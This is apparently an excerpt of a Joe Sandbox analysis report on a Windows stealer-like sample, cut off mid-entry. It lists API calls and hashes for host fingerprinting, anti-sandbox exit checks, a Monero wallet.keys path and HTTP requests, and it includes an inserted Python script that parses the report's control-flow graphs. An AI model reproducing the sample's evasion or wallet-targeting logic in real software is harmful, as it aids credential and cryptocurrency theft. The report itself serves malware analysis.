                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                • Instruction ID: 8987cf73115bf4b3ed1d96451ade0b5a555284414a49c76dc9dcdb0194dea2a8
                                • Opcode Fuzzy Hash: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                • Instruction Fuzzy Hash: 4EE11F71A205089ACF14FBA0EC57EEE737CAF55340F508528B50666493EF346A09EBD2

                                 Control-flow Graph (rendered graph omitted; executed/not-executed colouring lost in extraction; node data recovered): 917a0 StrCmpCA against block → 917cf ExitProcess; otherwise 917d7 (call 9aad0) → loop head 917f4 → 917fe/91817 multi-way dispatch with nine StrCmpCA compares (9185d, 9187f, 918ad, 918cf, 918f1, 91913, 91932, 91951, 91970) and four 9a820 calls (91821, 91835, 91849, 9198f), every arm rejoining at 9199e → 917f4; loop exit at 919c2 (call 9a800).
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 000917C5
                                • ExitProcess.KERNEL32 ref: 000917D1
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: e8dd4679bf811d04dfddd7606a015b7120fdc797e67662556eac41bbaccebbe3
                                • Instruction ID: ea90c2cad7ec20d308a4c38e85c13639ac91004d53b5c6541e4293bc48d914a6
                                • Opcode Fuzzy Hash: e8dd4679bf811d04dfddd7606a015b7120fdc797e67662556eac41bbaccebbe3
                                • Instruction Fuzzy Hash: F15128B5B0420AEBDF14DFA0DA58AFE77B5BF44704F208048E906AB250D771E951EB62

                                 Control-flow Graph (rendered graph omitted; executed/not-executed colouring lost in extraction; node data recovered): 97500 GetWindowsDirectoryA → 97553 GetVolumeInformationA, 98d00 ×3 → 975d8 loop over 975e1 (call 98d00) → 975fc GetProcessHeap, RtlAllocateHeap → 97628 wsprintfA, 9a740 (or 97619 call 9a740 on the other branch) → 9767e.
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00097542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0009760A
                                • wsprintfA.USER32 ref: 00097640
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-1928815233
                                • Opcode ID: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                • Instruction ID: 56a6533f98e7cee51110eb0b6ccc1866a195ce31a0948bf01b9de5b316ca4e85
                                • Opcode Fuzzy Hash: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                • Instruction Fuzzy Hash: 144191B1D04248ABDF10DF94DC49FEEBBB8EF08704F104199F509A7281DB74AA44DBA5

                                 Control-flow Graph (rendered graph omitted)
                                APIs
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D017D0), ref: 000998A1
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01650), ref: 000998BA
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01770), ref: 000998D2
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D015A8), ref: 000998EA
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016F8), ref: 00099903
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D08AF0), ref: 0009991B
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF4FD0), ref: 00099933
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF5110), ref: 0009994C
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01788), ref: 00099964
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01698), ref: 0009997C
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01740), ref: 00099995
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016C8), ref: 000999AD
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF4F90), ref: 000999C5
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016B0), ref: 000999DE
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 000811D0: ExitProcess.KERNEL32 ref: 00081211
                                  • Part of subcall function 00081160: GetSystemInfo.KERNEL32(?), ref: 0008116A
                                  • Part of subcall function 00081160: ExitProcess.KERNEL32 ref: 0008117E
                                  • Part of subcall function 00081110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                  • Part of subcall function 00081110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                  • Part of subcall function 00081110: ExitProcess.KERNEL32 ref: 00081143
                                  • Part of subcall function 00081220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                  • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081258
                                  • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081266
                                  • Part of subcall function 00081220: ExitProcess.KERNEL32 ref: 00081294
                                  • Part of subcall function 00096770: GetUserDefaultLangID.KERNEL32 ref: 00096774
                                  • Part of subcall function 00081190: ExitProcess.KERNEL32 ref: 000811C6
                                  • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                  • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                  • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                  • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                  • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                  • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                • Sleep.KERNEL32(00001770), ref: 00096B04
                                • CloseHandle.KERNEL32(?,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                • ExitProcess.KERNEL32 ref: 00096B22
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                • Instruction ID: 2b41a55a420a45435638e155a4bd9aa06a691f7c077b3d5e65278f6cb2bf867a
                                • Opcode Fuzzy Hash: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                • Instruction Fuzzy Hash: 8D31EA71A50208AADF04FBF0EC5ABEEB778BF15740F104518F212A6193DF716905EBA6

                                 Control-flow Graph
                                 Basic blocks (address range: calls) and their successors, recovered from the rendered graph:
                                 • 81220-81247: call 989b0, GlobalMemoryStatusEx → 81249-81271, 81273-8127a
                                 • 81249-81271: call 9da00 (×2) → 81281-81285
                                 • 81273-8127a → 81281-81285
                                 • 81281-81285 → 8129a-8129d, 81287
                                 • 81287 → 81289-81290, 81292-81294
                                 • 81289-81290 → 8129a-8129d, 81292-81294
                                 • 8129a-8129d (no successor)
                                 • 81292-81294: ExitProcess
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                • __aulldiv.LIBCMT ref: 00081258
                                • __aulldiv.LIBCMT ref: 00081266
                                • ExitProcess.KERNEL32 ref: 00081294
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                • Instruction ID: e003f515d5a38b9f1972656083cfc934a261137a834f630560b5ed00df5f5e9b
                                • Opcode Fuzzy Hash: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                • Instruction Fuzzy Hash: BB014BB0940308AAEF10EBE0DC4AFDEBBB8BF04705F208049E605B62C1D67455568799

                                 Control-flow Graph
                                 Basic blocks (address range: calls) and their successors, recovered from the rendered graph:
                                 • 96af3 → 96b0a
                                 • 96b0a → 96aba-96ad7, 96b0c-96b22
                                 • 96aba-96ad7: call 9aad0, OpenEventA → 96ad9-96af1, 96af5-96b04
                                 • 96ad9-96af1: call 9aad0, CreateEventA → 96b0c-96b22
                                 • 96af5-96b04: CloseHandle, Sleep → 96b0a
                                 • 96b0c-96b22: call 96920, call 95b10, CloseHandle, ExitProcess
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                • Sleep.KERNEL32(00001770), ref: 00096B04
                                • CloseHandle.KERNEL32(?,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                • ExitProcess.KERNEL32 ref: 00096B22
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                • Instruction ID: 8e6ff322a79a44aee732aef5a931523b1c9842281e0e7d7e483b3c55266c8cf8
                                • Opcode Fuzzy Hash: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                • Instruction Fuzzy Hash: 3BF05E70A44209ABEF10ABA0EC1ABBE7B74FB04745F104514B512A11C2DBB25540FA97
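The two control-flow graphs in these entries (the GlobalMemoryStatusEx routine starting at 81220 and the OpenEventA/CreateEventA loop starting at 96aba) survive in the text export of the report only as a flat token stream of node ids, address ranges, calls and "src->dst" edges. As an added example that is not part of the Joe Sandbox report or of the sample, the following Python parses that token form, embedded below as constructed input copied from the report, back into basic blocks and edges and answers the questions an analyst puts to such a function: where it branches, which branch feeds a block that calls ExitProcess, whether any block returns to the caller, and whether a Sleep sits on a cycle. For the first graph it finds one return block (8129a-8129d) and two guards (81287 and 81289-81290) whose other edge ends in ExitProcess; for the second it finds no return block at all: the function either loops through CloseHandle and Sleep or ends the process after the calls at 96b0c-96b22. The parser and the names of the summary fields are this example's own.

```python
import re
from collections import defaultdict, deque

# Constructed input: the two graphs from this report, copied in the token form
# the text export uses (node id, address range, calls, then "src->dst" edges).
CFG_MEMORY_CHECK = (
    "control_flow_graph 1436 81220-81247 call 989b0 GlobalMemoryStatusEx "
    "1439 81249-81271 call 9da00 * 2 1436->1439 1440 81273-8127a 1436->1440 "
    "1441 81281-81285 1439->1441 1440->1441 1443 8129a-8129d 1441->1443 "
    "1444 81287 1441->1444 1446 81289-81290 1444->1446 "
    "1447 81292-81294 ExitProcess 1444->1447 1446->1443 1446->1447"
)
CFG_EVENT_LOOP = (
    "control_flow_graph 1450 96af3 1451 96b0a 1450->1451 "
    "1453 96aba-96ad7 call 9aad0 OpenEventA 1451->1453 "
    "1454 96b0c-96b22 call 96920 call 95b10 CloseHandle ExitProcess 1451->1454 "
    "1459 96ad9-96af1 call 9aad0 CreateEventA 1453->1459 "
    "1460 96af5-96b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # block address or address range
ID_RE = re.compile(r"^\d+$")                            # graph node id


def parse_cfg(text):
    """Return ({node_id: {"range": str, "calls": [str]}}, [(src, dst), ...])."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif ID_RE.match(t) and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            cur = int(t)                                 # node id followed by its address range
            nodes[cur] = {"range": toks[i + 1], "calls": []}
            i += 2
        elif cur is None:
            raise ValueError(f"unexpected token before the first block: {t}")
        elif t == "call" and i + 1 < len(toks):          # "call 989b0": an internal call target
            nodes[cur]["calls"].append(f"call {toks[i + 1]}")
            i += 2
        elif t == "*" and i + 1 < len(toks):             # "* 2": repeat count of the previous call
            nodes[cur]["calls"][-1] += f" x{toks[i + 1]}"
            i += 2
        else:                                            # an imported API the plugin resolved
            nodes[cur]["calls"].append(t)
            i += 1
    return nodes, edges


def successors(edges):
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    return succ


def reaches(succ, src, dst):
    """True if dst is reachable from src over at least one edge; reaches(n, n) means n is on a cycle."""
    seen, todo = set(), deque(succ[src])
    while todo:
        n = todo.popleft()
        if n == dst:
            return True
        if n not in seen:
            seen.add(n)
            todo.extend(succ[n])
    return False


def summarize(text):
    """The questions an analyst asks of a function graph, answered as node ids."""
    nodes, edges = parse_cfg(text)
    succ = successors(edges)
    targets = {b for _, b in edges}
    exits = sorted(n for n, d in nodes.items() if "ExitProcess" in d["calls"])
    branches = sorted(n for n in nodes if len(succ[n]) > 1)
    return {
        "blocks": len(nodes),
        "edges": len(edges),
        "entry": min(n for n in nodes if n not in targets),
        "branches": branches,
        # branch blocks with a direct edge into an ExitProcess block: where the decision to die is taken
        "exit_guards": [n for n in branches if any(s in exits for s in succ[n])],
        "exit_blocks": exits,
        # sinks that do not call ExitProcess: the only way the function returns to its caller
        "return_blocks": sorted(n for n in nodes if not succ[n] and n not in exits),
        # a Sleep on a cycle is a polling or wait loop
        "sleep_loops": sorted(n for n, d in nodes.items() if "Sleep" in d["calls"] and reaches(succ, n, n)),
    }


def describe(text):
    """One readable line per basic block: range, calls, successor ranges."""
    nodes, edges = parse_cfg(text)
    succ = successors(edges)
    return [f"{d['range']}: {', '.join(d['calls']) or '-'} -> "
            f"{[nodes[s]['range'] for s in succ[n]]}" for n, d in nodes.items()]


if __name__ == "__main__":
    for name, cfg in (("memory check", CFG_MEMORY_CHECK), ("event loop", CFG_EVENT_LOOP)):
        print(name, summarize(cfg))
        print("\n".join(describe(cfg)))
```

The same token grammar applies to every graph in a Joe Sandbox text export, so the parser can be pointed at the other "control_flow_graph" lines of this report; a function whose summary shows exit guards but no return block, as here, is one whose only non-fatal outcome is a loop, which is exactly the shape of a wait-for-previous-instance routine.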

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 1ae22f97f5794732c0cbd55a36e6fb201b06674e83cc4dd24c9db1240512372a
                                • Instruction ID: f5ba20ac16e16b59c90abc31b94d7cc3198f3c25062ca6c02a3ba739de2bc771
                                • Opcode Fuzzy Hash: 1ae22f97f5794732c0cbd55a36e6fb201b06674e83cc4dd24c9db1240512372a
                                • Instruction Fuzzy Hash: 3D212F71D00208ABDF14EFA4E94AADD7B74FB45310F108225E515A72C1DB706609DB91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                  • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                  • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                  • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                  • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                  • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                • Instruction ID: 76e121dc5425604fe00f2fa5ebc5cabc0ea154c32812741bcf76bfd684cc83e5
                                • Opcode Fuzzy Hash: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                • Instruction Fuzzy Hash: 7911EC30A10548ABCF14FFA4DD52AED7378AF51340F404168F91A5A593EF70AB0AE7D2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                • Instruction ID: baa3f63b23dc38181db5b74ebc341b919c036db1a778509a126945ffe7204b72
                                • Opcode Fuzzy Hash: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                • Instruction Fuzzy Hash: 6A01A9B1A44208EFDB10DF94DD49FAEBBF8F704B15F10421AF645E3280C37459008BA1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                • ExitProcess.KERNEL32 ref: 00081143
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
